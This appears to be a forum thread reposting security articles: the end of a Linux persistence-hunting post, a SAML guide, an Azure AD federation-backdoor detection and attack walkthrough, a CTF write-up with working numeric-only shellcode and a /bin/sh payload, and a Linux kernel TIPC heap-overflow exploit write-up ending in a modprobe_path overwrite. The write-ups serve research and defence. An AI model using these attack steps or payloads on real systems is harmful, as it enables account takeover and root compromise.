'${path.config}/audit.rules.d/\*.conf' ] audit_rules: | ## Define audit rules # ... In this case it is in /etc/auditbeat/audit.rules.d/ and I add audit-rules.conf from https://github.com/Neo23x0/auditd/blob/master/audit.rules For some of the custom rules I make I add it in /etc/auditbeat/audit.rules.d/custom.conf Other sources: https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-linux-version-of-the-windows-sysmon-tool/ https://github.com/elastic/integrations/issues/1930 Photo by Brook Anderson on Unsplash Pepe Berba Cloud Security at Thinking Machines| GMON, CCSK | Ex-Machine Learning Researcher and Ex-SOC Engineer Sursa: https://pberba.github.io/security/2021/11/22/linux-threat-hunting-for-persistence-sysmon-auditd-webshell/
  4. A Complete Guide to Implementing SAML Authentication in Enterprise SaaS Applications Identity Aviad Mizrachi 7 min readJuly 15, 2021 SIGN UP TO OUR NEWSLETTER. Get the latest articles on all things data delivered straight to your inbox. Start for free What Is SAML Authentication? SAML stands for Security Assertions Markup Language. Let’s say an organization wishes to authenticate its users without creating IAM roles and communicate assertions between the source and the target in a cloud environment. This can be easily achieved with the help of SAML. Image Source SAML is a method of secure communication between parties using extensible markup language (XML). The following two endpoints are typically used in SAML: Identity provider: The source that makes the request is known as the “identity provider” and the user’s identity might be either username/password or username/OTP. Service provider: The “service provider” is the target to which the started request is directed for verification; it may be Gmail, AWS, or Salesforce. It keeps track of user permission records, and grants access to Software as a Service (SaaS) applications. It also keeps track of how long a user is permitted to stay or how to keep a user’s session on a certain application alive. SAML is built on the notion of single sign-on (SSO). It means that one can use the same credentials on all of an organization’s portals to which they have access. SAML can also be used for access control list (ACL) permissions, in which it determines whether or not a user is authorized to access a specific resource. There’s also SAML 2.0, which is a version of the SAML standard that enables web-based, cross-domain SSO. It was ratified back in 2005. Benefits of SAML For users and systems built independently by an organization, SAML enables both authentication and authorization. There is no need to use or remember numerous credentials after it is implemented. Only one sort of credential can access all of the organization’s resources or systems. SAML follows a standard methodology that is not dependent on any system because it has no interoperability concerns with multiple products/vendors. SAML follows a standard method that is not dependent on any system. It uses a single point of entry to validate a user’s identity, allowing it to provide secure authentication without keeping user data or requiring directory synchronization. As a result, it removes the possibility of identity theft. The SSO principle provides a hassle-free and speedier environment for its users. Administrative costs are also lowered for service providers. Because different authentication endpoints aren’t required, there’s no need to develop them. It makes the system more dependable in terms of “risk transference” because it transmits responsibility based on identity. Let’s discuss the benefits of SAML from different stakeholders’ perspectives: SAML v.s OAuth OAuth stands for “Open Authorization“. OAuth, like SAML, employs an authorization server to complete the login process, and both are based on the SSO principle. Let’s look at some of the fundamental differences between them. SAML is concerned with the user, whereas OAuth is concerned with the application. Users are managed centrally in SAML. When a user logs into his organization’s network, he has access to all the resources because everything is centralized. However, if a user wants to provide third-party websites access to his information from a website like Facebook or Google, OAuth is required. SAML can do both authentication and authorization, whereas OAuth can only do the latter. OAuth is based on JavaScript Object Notation (JSON), binary, or even SAML forms, whereas SAML is based on XML format. In SAML, a token is referred to as a SAML assertion. In OAuth, a token is referred to as an access token. If users need temporary access to resources, utilize OAuth instead of SAML because it is more lightweight. How SAML Authentication Works Image by Author The identity provider obtains the user’s credentials (username and password). SAML validates the user’s identity at this stage. The identity provider will now verify the credentials and permissions associated with that account. If the user’s credentials are correct, the identity provider will respond with a token and the user’s approved response to access the SaaS application. This token is sent to the service provider using a POST request. The service provider will now validate the token. If the token is valid, it will generate temporary credentials and direct the user to the desired application terminal. Note: The actions listed above will only work if there is a “trust connection” between the identity provider and the service provider. The authentication process will fail if that does not exist. How We Can Create a Trust Relationship between Identity Provider and Service Provider The SAML basic configuration must be agreed upon by both the identity provider and the service provider. As a result, an identical configuration is required at both endpoints; otherwise, SAML will not work. How It Works: Create a SAML document and submit it to the service provider. However, this document would be in XML format. We must first generate a certificate from the host machine. Similarly, generate a document on the service provider and then import it on the identity provider. That document has a lot of information like certificate information, email address of the organization, and public key of the service provider. SAML Use Cases When an organization implements SAML, it can do so in a variety of ways. For example, all infrastructure can be deployed on-premises, in the cloud, or in a hybrid structure where part of it is on the cloud and part is on-premises. We have a couple of use cases based on it. Hybrid In this situation, identity verification takes place on-premises, but authorization takes place in the cloud, and the user has immediate access to the cloud resource before authentication, then: Users can access cloud resources directly. For authentication, users will be redirected to an on-premises setup. The identity provider verifies the user’s identity and provides the SAML assertion for the service provider’s use. The service provider will validate the assertion, and the user will be sent to the web application. Cloud-Based Both the identity provider and the service provider are cloud-based in this scenario, and the apps are either cloud-based or on-premises. First, users will be redirected to the cloud infrastructure to verify their identity. Identity as a service (IaaS) is a term used to describe how identity providers work (IDAAS). Authentication will be handled via the identity provider. The identity provider assigns assertions after authentication. The service provider verifies the veracity of the claim and provides the user access to the web application. How to Implement SAML on the Cloud It is relatively simple to deploy SAML in the cloud because most cloud service providers now provide an option to do so automatically; you don’t need to know rocket science to do so. Here, we are discussing how you can implement SAML on Google Cloud. Step 1 Create an account on Google Cloud and enable the identity provider. Step 2 Now it’s time to set up the provider; there are a few things to do. Go to Identity Provider -> Click on Add Provider -> Select SAML list from there -> Enter details such as Provider Name, Provider’s Entity ID, Provider’s SSO URL, Certificate (used for token signing). Go to Service Provider -> Provide Entity Id (that verifies your application). Step 3 Add application URL in the authorized domain. Step 4 2. After adding all this information at different places, click on save. These are some basic cloud measures that we can use. However, we can take the procedures listed below to secure it, such as: Signing request: By signing authentication requests, this feature improves the security of the requests. Link user accounts: There’s a chance the user has already signed into the program, but with a different method than username/password. As a result, we can link the existing account to the SAML provider in such a scenario. Re-authenticating user: When a user changes his email, password, or any other sensitive information, it is the obligation of the SAML to re-authenticate the user. SAML Authentication Best Practices Although we discussed the fundamentals of SAML, there are other fundamentals that make SAML communication more safe. For secure web communication, always use SSL/TLS. As a result, all communication between users, identity providers, and service providers is encrypted at all times. Since communication is encrypted, an attacker attempting an MITM attack will be unable to access or modify the data. As a result, the requests’ confidentiality and integrity are preserved. Whenever creating a trust relation between identity providers and service providers, configure identity providers to use HTTP POST, and for redirection of SAML responses, use the whitelisted domains. The service provider does not perform the authentication operation. If the domain is not whitelisted, attackers can manipulate the domain and redirect them into a malicious domain. SAML uses XML to perform validation schema on XML documents so that unsanitized user input cannot pass. Always prefer local schema from XML. Do not download it from untrusted websites. Maintain a blacklist of the domains that the organization wants to exclude from the SAML authentication process. As an identity provider, we can manage the user through access control. Aviad Mizrachi Sursa: https://frontegg.com/blog/implementing-saml-authentication-in-enterprise-saas-applications
  5. How to Detect Azure Active Directory Backdoors: Identity Federation November 23, 2021 During the Solarwinds breach performed by Russian threat actors, one of the techniques utilised by the threat actors to gain control of a victim's Azure Active Directory (AAD) was to create an AAD backdoor through identity federation. The implication of this attack was that the threat actors were able to log in and impersonate any Microsoft 365 (M365) user and bypass all requirements for MFA as well as bypass any need to enter a valid password. As you can imagine, if the correct detection controls are not in place – this can allow persistence for the threat actors to impersonate any user and maintain access and control of the victim’s AAD / M365 instance. The technique of backdooring AAD is a technique that tends to be used post-compromise – whereby an attacker has already gained access to an account with Global Administrator or Hybrid Identity Administrator privileges. As such, it’s crucial organisations are monitoring for accounts that get given these two privileges. There are many ways an attacker can gain Global Administrator privileges within AAD – one of those techniques is by performing privilege escalation on service principals with an owner who has Global Administrator privileges. I have written a previous blog post covering backdooring Azure applications and service principal abuse here. The intention of this blog post is to cover how to create an Azure AD backdoor utilising the AADInternals tool by @DrAzureAD, the AAD portal and the MSOnline PowerShell module. As such, I’ve broken this blog post into two sections – the first one focusing on the detection and second part focusing on the attack flow. Detection Methodology To detect a malicious AzureAD backdoor, there are three key elements to consider in the analysis methodology: Review all federated domain names within AAD Review audit logs and unified audit logs for any newly federated domains Review audit logs for ImmutableIds being added/created for an account Review all anomalous logons in the Azure Sign-in logs and the unified audit logs (UAL) Step 1: Reviewing Federated Domain Names Within the AAD portal the “Custom Domain Names” section lists all domains that are relevant to the instance. In this particular section, I would advise reviewing all domains that have the “federated” tick next to it. Step 2: Detect any newly federated domains in AAD Both the AAD audit logs and the unified audit logs will track activity pertaining to the creation of a newly federated domain. These events should not occur frequently, so setting up an alert on this should not be generating much noise. Since AAD stores audit log and sign-in log activity for 7-30 days based on the license, I’d also recommend setting up the same detection on the unified audit logs. The detection should focus on looking at the following fields for a match: Activity: "Set domain authentication" IssuerURI: "http://any.sts/*" LiveType: "Federated" The screenshot below shows how this is represented within the audit logs in the portal. Further review of the audit logs should show a sequence of activity pertaining to the verification of the malicious domain along with the federation activity. I would also hunt for the following activities: Verify domain: Success or Failure Add unverified domain: Success Step 3: Detecting modifications to ImmutableIDs for accounts For a backdoor to be set, the impersonated user with Global Admin / Hybrid Identity Admin credentials needs to have an ImmutableID set. This will create an event in AAD Audit Logs. I would write a detection that looks for: Activity: "Update User" Included Updated Properties: "SourceAnchor" As you can see from the screenshot below – the ImmutableID I created was “happyegg”. By detecting the existence of “Included Updated Properties” mapping to “SourceAnchor”, you can detect the creation/modification of the ImmutableID. Step 4: Review anomalous sign-ins It’s difficult to review the AAD sign-in logs to ascertain this behaviour as the attackers can basically impersonate any user and login. The premise of the backdoor is that the attackers can bypass MFA. When I performed this attack on my test instance, it generated the following events with these details which shouldn’t be too common for a user. However, based on this attack, these logon events can vary and can generate false positive. I would keep this in mind before turning this into a detection query. You can also focus on detecting general anomalous sign-ins that match other IoCs collected in terms of IPs, user-agent strings etc within the Unified Audit Logs (UAL). Attack Methodology This next section focuses on how to perform this attack, I relied heavily on the documentation written by @DrAzureAD in his blog here. I did this a little differently, but you can also do the entire thing using just AADInternals. Step 1: Set the ImmutableID string for the user you want to impersonate In order for this attack to work, the user you are impersonating needs to have an ImmutableID set. I used MSOnline module to perform this section. I first ran a check to see if there were any existing ImmutableIDs set in my tenant: The account I wanted to target is my global administrator account – so using MSOnline I set an ImmutableID for that account as “happyegg”. Step 2: Register a malicious domain For this to work, you need to register / create a malicious domain that you can use as your backdoor. I followed @DrAzureAD recommendation and generated a free one using www.myo365.site called “evildomain.myo365.site”. I decided to add the domain to my tenant via the AAD portal. You can do this by clicking into “Custom domain names” and adding your custom domain name there. It will guide you through a verification check where you will need to ensure that the malicious domain you created has the same TXT field as the one issued by Microsoft. The Microsoft documentation for how to add a custom domain name is here. Step 3: Create the AAD backdoor I used AADInternals to do this the same way @DrAzureAD detailed in his blog. This then provides you with an IssuerURI which you will then utilise to login. Step 4: Login through your AAD Backdoor Using AADInternals again, I logged in – as you can see in the screenshot below it automatically opens a browser and shows the “Stay signed in?” page. By clicking “YES” you are automatically taken into the M365 logged in as that user. Attack complete! References https://o365blog.com/post/aadbackdoor/ https://docs.microsoft.com/en-us/powershell/module/msonline/set-msoluser?view=azureadps-1.0 https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/add-custom-domain https://docs.microsoft.com/en-us/powershell/module/msonline/?view=azureadps-1.0 Sursa: https://www.inversecos.com/2021/11/how-to-detect-azure-active-directory.html
  6. Numeric Shellcode Jan 12, 2021 10 minutes read Introduction In December 2020 I competed in Deloitte’s Hackazon CTF competition. Over the course of 14 days they released multiple troves of challenges in various difficulties. One of the final challenges to be released was called numerous presents. This task immediately piqued my interest as it was tagged with the category pwn. The challenge description reads: 600 POINTS - NUMEROUS PRESENTS You deserve a lot of presents! Note: The binary is running on a Ubuntu 20.04 container with ASLR enabled. It is x86 compiled with the flags mentioned in the C file. You can assume that the buffer for your shellcode will be in eax. Tip: use hardware breakpoints for debugging shellcode. Challenge code The challenge is distributed as a .c file with no accompanying reference binary. Personally I’m not a big fan of this approach, the devil is in the details when it comes to binary exploitation, but let’s have a look: #include <stdio.h> // gcc -no-pie -z execstack -m32 -o presents presents.c unsigned char presents[123456] __attribute__ ((aligned (0x20000))); int main(void) { setbuf(stdout, NULL); puts("How many presents do you want?"); printf("> "); scanf("%123456[0-9]", presents); puts("Loading up your presents..!"); ((void(*)())presents)(); } Alright, at least the invocation for gcc is embedded as a comment, and the challenge code itself is brief and and straight forward. There is a static uninitialized buffer presents that resides in the .bss of the program. The libc routine scanf is used to fill this buffer and jump to it. There is one catch though, the format-string used here is %123456[0-9]. This uses the %[ specifier to restrict the allowed input to only the ASCII literals for the numbers 0 till 9 (0x30-0x39). So essentially they are asking us to write a numeric only shellcode for x86 (not amd64). Is this even possible? There is plenty of supporting evidence to be found that this is possible when restricted to alpha-numeric characters, but what about numeric-only? Long story short: yes it is definitely possible. In the remaining part of the article I will explain the approach I took. Unfortunately though, this is not a fully universal or unconstrained approach, but it is good enough™ for this particular scenario. Diving in If we set up a clean Ubuntu 20.04 VM and apt install build-essential and build the provided source, we end up with a binary which has the presents global variable located at 0x08080000. Examining the disassembly listing of main we can see the function pointer invocation looks like this: mov eax, 0x8080000 call eax So indeed, like the challenge description suggested EAX contains a pointer to our input/shellcode. So what kind of (useful) instructions can we generate with just 0x30-0x39? Instead of staring at instruction reference manuals and handy tables for too long I opted to brute-force generate valid opcode permutations and disassemble+dedup them. Exclusive ORdinary Instructions There was no easy instructions to do flow control with numerics only, let alone a lot of the arithmetic. There was no way to use the stack (push/pop) as some kind of scratchpad memory as is often seen with alphanumeric shellcoding. Let’s look at some obviously useful candidates though.. they are all xor operations. 34 xx -> xor al, imm8 30 30 -> xor byte ptr [eax], dh 32 30 -> xor dh, byte ptr [eax] 32 38 -> xor bh, byte ptr [eax] 35 xx xx xx xx -> xor eax, imm32 Ofcourse, any immediate operands have to be in the 0x30-0x39 range as well. But these instructions provide a nice starting point. xor byte ptr [eax], dh can be used to (self-)modify code/data if we manage to point eax to the code/data we want to modify. Changing eax arbitrarily is a bit tricky; but with the help of xor eax, imm32 and xor al, imm8 we can create quite a few usable addresses. (More on this in a bit) Writing numeric only shellcode is all about expanding your arsenal of primitives, in a way that eventually yields a desired end result. If we were to start mutating opcodes/instructions using the xor [eax], dh primitive, we need to have a useful value in dh first. Bootstrapping If we look at the register contents of ebx and edx in the context of this particular challenge, we see that ebx points to the start of the .got.plt section (0x0804c000) and edx is clobbered with the value 0xffffffff at the time the trampoline instruction (call eax) to our shellcode is being executed. In short, bh = 0xc0 and dh = 0xff. If we start our journey like this: xor byte ptr [eax], dh ; *(u8*)(eax) ^= 0xff (== 0xcf) xor dh, byte ptr [eax] ; dh ^= 0xcf (== 0x30) xor bh, byte ptr [eax] ; bh ^= 0xcf (== 0x0f) We end up with some (what I would call) useful values in both dh and bh. What exactly makes 0x30 and 0x0f useful though? Well for one, by xor’ing numeric code with 0x30 we can now (relatively) easily introduce the values 0x00-0x09. To be able to arbitrarily carve certain bytes in memory I picked a method that relies on basic add arithmetic. add byte ptr [eax], dh and add byte ptr [eax], bh are almost numeric only. They start with a 0x00 opcode byte though. But this value can now be carved by xor’ing with dh, which contains 0x30. Here it becomes useful that we have a value in dh which only has bits set in the upper nibble, and a value in bh which only has bits set in the lower nibble. By combining a (reasonable!) amount of add arithmetic using bh and dh as increment values we can carve any value we want. So let’s say we want to produce the value 0xCD (CD 80 happens to be a useful sequence of bytes when writing x86/Linux shellcode ;-)). start value = 0x31 0x31 + (0x30 * 2) = 0x91 0x91 + (0x0f * 4) = 0xcd as you can see, with a total of 6 add operations (2 with bh and 4 with bh) we can easily construct the value 0xCD if we start with a numeric value of 0x31. It is fine if we overflow, we are only working with 8bit registers. Pages and overall structure Having the ability to turn numeric bytes into arbitrary bytes is a useful capability, but it heavily relies on being able to control eax to pick what memory locations are being altered. Let’s try to think about our eax-changing capabilities for a bit. We have the xor eax, imm32 and xor al, imm8 instructions at our disposal. Of course, the supplied operands to these instructions need to be in the numeric range. By chaining two xor eax, imm32 operations it becomes possible to set a few nibbles in EAX to arbitrary values, while not breaking the numeric-only rule for the operands. By adding an optional xor al, 0x30 to the end we can toggle the upper nibble of the least significant byte of eax to be 0x30. This gives us a nice range of easily selectable addresses. A quick example would look something like this: ; eax = 0x08080000, our starting address xor eax, 0x30303130 ; eax = 0x38383130 xor eax, 0x30303030 ; eax = 0x08080100 xor al, 0x30 ; eax = 0x08080130 Lets treat the lower 16bits of eax as our selectable address space, we have the ability to select addresses in the form of 0x08080xyz where x and z can be anything between 0 and f and y can be either 3 or 0. In essence, we can easily increase/decrease eax with a granularity of 0x100 and within each 0x100-sized page (from here on, page) we can select addresses 00-0f and 30-3f. I came up with a structure for the shellcode where each page starts with code that patches code in the same page at offset 0x30 and higher, and the code at offset 0x30 and higher in the page then patches the final shellcode. Indeed, we’re using self-modifying code that needs to be self-modified before it can self-modify (yo dawg). Roughly, the layout of our pages look like this: 000: setup code 100: page_patcher_code_0 (patches shellcode_patcher_code_0) 130: shellcode_patcher_code_0 (patches shellcode) 200: page_patcher_code_1 (patches shellcode_patcher_code_1) 230: shellcode_patcher_code_1 (patches shellcode) ... f00: shellcode that gets modified back into original form This means we can have a maximum of up to 14 patch pages (we lose page 0 to setup code), which doesn’t allow us to use very big shellcodes. However, as it turns out, this is enough for a read(stdin, buffer, size) syscall, which was good enough to beat this challenge, and (in general) is enough for staging a larger shellcode. Padding With our limited addressing there’s quite a bit of ‘dead’ space we can’t easily address for modifying. We’ll have to find some numeric-only nop operation so we can slide over these areas. Most of our numeric instructions are exactly 2 bytes, except for xor eax, imm32 which is 5 bytes. The xor eax, imm32 is always used in pairs though, so our numeric code size is always evenly divisble by 2. This means we can use a 2-byte nop instruction and not run into any alignment issues. I picked cmp byte ptr [eax], dh (38 30) as my NOP instruction, as eax always points to a mapped address, and the side-effects are mininmal. Another option would’ve been to use the aaa instruction (37), which is exactly 1 byte in size. But it clobbers al in some cases, so I avoided it. Putting it all together Initially while I was developing this method I manually put together these self modifying numeric only contraptions (well, with some help of GNU assembler macro’s).. which works but is quite a painful and error prone process. Eventually I implemented all the details in an easy to use python script, numeric_gen.py. This tool takes care of finding the right xor masks for address selection, and calculating the optimal amount of mutation instructions for generating the shellcode. Do note, this tool was written with the challenge I was facing. You’ll want to modify the three constants (EDX, EBX, EAX) at the top if you plan to reuse my exact tooling. Popping a shell So we’ll write a quick stager shellcode that is compact enough to be num-only-ified. It will use the read syscall to read the next stage of shellcode from stdin. We’ll put the destination buffer right after the stager itself, so there’s no need for trailing nop instructions or control flow divertion. The careful reader will notice I’m not setting edx (which contains the size argument for the read syscall) here since its already set to a big enough value. bits 32 global _start _start: mov ecx, eax ; ecx = eax add ecx, 0xd ; ecx = &_end xor ebx, ebx ; stdin xor eax, eax xor al, 3 ; eax = NR_read int 0x80 _end: That should do the trick. Time to run it through the tool and give it a shot. $ nasm -o stager.bin stager.asm $ xxd stager.bin 00000000: 89c1 83c1 0d31 db31 c034 03cd 80 .....1.1.4... $ python3 numeric_gen.py stager.bin stager_num.bin [~] total patch pages: 14 [>] wrote numeric shellcode to 'stager_num.bin' [~] old length: 13 bytes, new length 3853 (size increase 29638.46%) $ xxd stager_num.bin 00000000: 3030 3230 3238 3530 3030 3035 3031 3030 0020285000050100 00000010: 3830 3830 3830 3830 3830 3830 3830 3830 8080808080808080 00000020: 3830 3830 3830 3830 3830 3830 3830 3830 8080808080808080 00000030: 3830 3830 3830 3830 3830 3830 3830 3830 8080808080808080 ... 00000ee0: 3830 3830 3830 3830 3830 3830 3830 3830 8080808080808080 00000ef0: 3830 3830 3830 3830 3830 3830 3830 3830 8080808080808080 00000f00: 3931 3531 3231 3031 3034 3431 32 9151210104412 $ xxd binsh.bin 00000000: 31c0 89c2 5068 6e2f 7368 682f 2f62 6989 1...Phn/shh//bi. 00000010: e389 c1b0 0b52 5153 89e1 cd80 .....RQS.... $ (cat stager_num.bin; sleep 1; cat binsh.bin; cat -) | ./presents How many presents do you want? > Loading up your presents..! id uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant) echo w00t w00t ^C Success! As you can see our final numeric shellcode weighs in at 3853 bytes. A little under 4KiB, and well within the allowed limit of 123456 characters. Closing words I hope you enjoyed this article, and I’m eager to hear what improvements others can come up with. Right now this is not a fully generic approach, and I have no personal ambitions to turn it into one either. Things like shellcode encoding are mostly a fun party trick anyway these days. 😉 – blasty Sursa: https://haxx.in/posts/numeric-shellcode/
  7. Exploiting CVE-2021-43267 Nov 24, 2021 11 minutes read Introduction A couple of weeks ago a heap overflow vulnerability in the TIPC subsystem of the Linux kernel was disclosed by Max van Amerongen (@maxpl0it). He posted a detailed writeup about the bug on the SentinelLabs website. It’s a pretty clear cut heap buffer overflow where we control the size and data of the overflow. I decided I wanted to embark on a small exploit dev adventure to see how hard it would be to exploit this bug on a kernel with common mitigations in place (SMEP/SMAP/KASLR/KPTI). If you came here to find novel new kernel exploitation strategies, you picked the wrong blogpost, sorry! TIPC? To quote the TIPC webpage: Have you ever wished you had the convenience of Unix Domain Sockets even when transmitting data between cluster nodes? Where you yourself determine the addresses you want to bind to and use? Where you don’t have to perform DNS lookups and worry about IP addresses? Where you don’t have to start timers to monitor the continuous existence of peer sockets? And yet without the downsides of that socket type, such as the risk of lingering inodes? Well.. I have not. But then again, I’m just an opportunistic vulndev person. Welcome to the Transparent Inter Process Communication service, TIPC in short, which gives you all of this, and a lot more. Thanks for having me. How to tipc-over-udp? In order to use the TIPC support provided by the Linux kernel you’ll have to compile a kernel with TIPC enabled, or load the TIPC module which ships with many popular distro’s. To easily interface with the TIPC subsystem you can use the tipc utility which is part of iproute2. For example, to list all the node links you can issue tipc link list. We want to talk to the TIPC subsystem over UDP, and for that we’ll have to enable the UDP bearer media. This can be done using tipc bearer enable media udp name <NAME> localip <SOMELOCALIP>. Under the hood the tipc userland utility uses netlink messages (using address family AF_TIPC) to do its thing. Interestingly enough, these netlink messages can be sent by any unprivileged user. So even if there’s no existing TIPC configuration in place, this bug can still be exploited. How to reach the vulnerable codepath? So now we know how to enable the UDP listener for TIPC, how do we go about actually reaching the vulnerable code? We’ll have to present ourselves as a valid node and establish a link before we can trigger the MSG_CRYPTO codepath. We can find a protocol specification on the TIPC webapge that details everything about transport, addressing schemes, fragmentation and so on. That’s a lot of really dry stuff though. I made some PCAPs of a tipc-over-udp session setup and with some handwaving and reading the kernel source narrowed it down to a few packets we need to emit before we can start sending the messages we are interested in. In short, a typical TIPC datagram starts with a header, that consist out of at least six 32bit words in big endian byte order. Those are typically referred to as w0 through w5. This header is (optionally) followed by a payload. w0 encodes the TIPC version, header size, payload size, the message ‘protocol’. There’s also a flag which indicates whether this is a sequential message or not. w1 encodes (amongst other things) a protocol message type specific to the protocol. The header also specifies a node_id in w3 which is a unique identifier a node includes in every packet. Typically, nodes encode their IPv4 address to be their node_id. A quick way to learn about the various bitfields of the header format is by consulting net/tipc/msg.h. To establish a valid node link we send three packets: protocol: LINK_CONFIG -> message type: DSC_REQ_MSG protocol: LINK_PROTOCOL -> message type: RESET_MSG protocol: LINK_PROTOCOL -> message type: STATE_MSG The LINK_CONFIG packet will advertise ourselves. The link is then reset with the LINK_PROTOCOL packet that has the RESET_MSG message type. Finally, the link is brought up by sending a LINK_PROTOCOL packet with the STATE_MSG message type. Now we are actually in a state where we can send MSG_CRYPTO TIPC packets and start playing with the heap overflow bug. Corrupting some memories A MSG_CRYPTO TIPC packet payload looks like this: struct tipc_aead_key { char alg_name[TIPC_AEAD_ALG_NAME]; unsigned int keylen; char key[]; }; As detailed in the SentinelLabs writeup, the length of the kmalloc’d heap buffer is determined by taking the payload size from the TIPC packet header. After which the key is memcpy’d into this buffer with the length specified in the MSG_CRYPTO structure. At first you’d think that means the overflow uses uncontrolled data.. but you can send TIPC packets that lie about the actual length of the payload (by making tipc_hdr.payload_size smaller than the actual payload size). This passes all the checks and reaches the memcpy without the remainder of the payload being discarded, giving us full control over the overflowed data. Great! The length specified in keylen will be passed to kmalloc directly. Smaller (up to 8KiB) heap objects allocated by the kernel using kmalloc end up in caches that are grouped by size (powers of two). You can have a peep at /proc/slabinfo and look at the entries prefixed by kmalloc- to get an overview of the general purpose object cache sizes. Since we can control the size of the heap buffer that will be allocated and overflowed, we can pick in which of these caches our object ends up. This is a great ability, as it allows us to overflow into adjacent kernel objects of a similar size! Defeating KASLR If we want to do any kind of control flow hijacking we’re going to need an information leak to disclose (at least) some kernel text/data addresses so we can deduce the randomized base address. It would be great if we could find some kernel objects that contain a pointer/offset/length field early on in their structure, and that can be made to return data back to userland somehow. While googling I stumbled on this cool paper by some Pennsylvania State University students who dubbed objects with such properties “Elastic Objects”. Their research on the subject is quite exhaustive and covers Linux, BSD and XNU.. I definitley recommend checking it out. Since we can pick arbitrarily sized allocations, we’re free to target any convenient elastic object. I went with msg_msg, which is popular choice amongst fellow exploitdevs. 😉 The structure of a msg_msg as defined in include/linux/msg.h: /* one msg_msg structure for each message */ struct msg_msg { struct list_head m_list; long m_type; size_t m_ts; /* message text size */ struct msg_msgseg *next; void *security; /* the actual message follows immediately */ }; You can easily allocate msg_msg objects using the msgsnd system call. And they can be freed again using the msgrcv system call. These system calls are not to be confused with the sendmsg and recvmsg system calls btw, great naming scheme! If we corrupt the m_ts field of a msg_msg object we can extend it’s size and get a relative kernel heap out-of-bounds read back to userland when retrieving the message from the queue again using the msgrcv system call. A small problem with this is that overwriting the m_ts field also requires trampling over the struct list_head members (a prev/next pointer). When msgrcv is called and a matching message is found, it wants to unlink it from the linked list.. but since we’re still in the infoleak stage of the exploit, we can’t put any legitimate/meaningful pointers in there. Lucikly, there’s a flag you can pass to msgrcv called MSG_COPY, which will make a copy of the message and not unlink the original one, avoiding a bad pointer dereference. So the basic strategy is to line up three objects like this: msg_msg msg_msg some_interesting_object and proceed to free the first msg_msg object and allocate the MSG_CRYPTO key buffer into the hole it left behind. We corrupt the adjacent msg_msg using the buffer overflow and subsequently leak data from some_interesting_object using the msgrcv system call with the MSG_COPY flag set. I chose to leak the data of tty_struct, which can easily be allocated by open’ing /dev/ptmx. This tty_struct holds all kinds of state related to the tty, and starts off like this: struct tty_struct { int magic; struct kref kref; struct device *dev; /* class device or NULL (e.g. ptys, serdev) */ struct tty_driver *driver; const struct tty_operations *ops; int index; ... } A nice feature of this structure is the magic at the very start, it allows us to easily confirm the validity of our leak by comparing it against the expected value TTY_MAGIC (0x5401). A few members later we find struct tty_operations *ops which points to a list of function pointers associated with various operations. This points to somewhere in kernel .data, and thus we can use it to defeat KASLR! Depending on whether the tty_struct being leaked belongs to a master pty or slave pty (they are allocated in pairs) we’ll end up finding the address of ptm_unix98_ops or pty_unix98_ops. As an added bonus, leaking tty_struct also allows us to figure out the address of the tty_struct because tty_struct.ldisc_sem.read_wait.next points to itself! Getting $RIP (or panic tryin') Naturally, the tty_operations pointer is a nice target for overwriting to hijack the kernel execution flow. So in the next stage of the exploit we start by spraying a bunch of copies of a fake tty_operations table. We can accurately guesstimate the address of one of these sprayed copies by utilizing the heap pointer we leaked in the previous step. Now we repeatedly: allocate msg_msg, allocate tty_struct(s), free msg_msg, trigger TIPC bug to (hopefully) overflow into a tty_struct. To confirm we actually overwrote (the first part) of a tty_struct we invoke ioctl on the fd we got from opening /dev/ptmx, this will call tty_struct.ops.ioctl and should get us control over $RIP if we managed to hijack the ops pointer of this object. If its not the case, we close() the pty again to not exhaust resources. Avoiding ROP (mostly) Where to jump to in the kernel? We could set up a ROP stack somewhere and pivot the stack into it.. but this can get messy quick, especially once you need to do cleanup and resume the kernel thread like nothing ever happened. If we look at the prototype of the ioctl callback from the ops list, we see: int (*ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg); We can set both cmd and arg from the userland invocation easily! So effectively we have an arbitrary function call where we control the 2nd and 3rd argument (RSI and RDX respectively). Well, cmd is actually truncated to 32bit, but that’s good enough. Let’s try to look for some gadget sequence that allows us to do an arbitrary write: $ objdump -D -j .text ./vmlinux \ | grep -C1 'mov %rsi,(%rdx)' \ | grep -B2 ret .. ffffffff812c51f5: 31 c0 xor %eax,%eax ffffffff812c51f7: 48 89 32 mov %rsi,(%rdx) ffffffff812c51fa: c3 ret .. This one is convenient, it also clears rax so the exploit can tell whether the invocation was a success. We now have some arbitrary 64bit write gadget! (For some definition of arbitrary, the value is always 32bit controlled + 32bit zeroes, but whatever) Meet my friend: modprobe_path Okay, we have this scuffed arbitrary write gadget we can repeatedly invoke, what do we overwrite? Classic kernel exploits would target the cred structure of the current task to elevate the privileges to uid0. We could of course build an arbitrary read mechanism in the same way we build the arbitrary write.. but lets try something else. There are various scenario’s in which the kernel will spawn a userland process (using the usermode_helper infrastructure in the kernel) to load additional kernel modules when it thinks that is nescessary. The process spawned to load these modules is, of course: modprobe. The path to the modprobe binary is stored in a global variable called modprobe_path and this can be set by a privileged user through the sysfs node /proc/sys/kernel/modprobe. This is a perfect candidate for overwriting using our write gadget. If we overwrite this path and convince the kernel we need some additional module support we can invoke any executable as root! One of these modprobe scenario’s is when you try to run a binary that has no known magic, in fs/exec.c we see: /* * cycle the list of binary formats handler, until one recognizes the image */ static int search_binary_handler(struct linux_binprm *bprm) { .. if (request_module("binfmt-%04x", *(ushort *)(bprm->buf + 2)) < 0) .. } request_module ends up invoking call_modprobe which spawns a modprobe process based on the path from modprobe_path. Closing Words I hope you enjoyed the read. Feel free to reach out to point out any inaccuracies or feedback. The full exploit can be found here Sursa: https://haxx.in/posts/pwning-tipc/
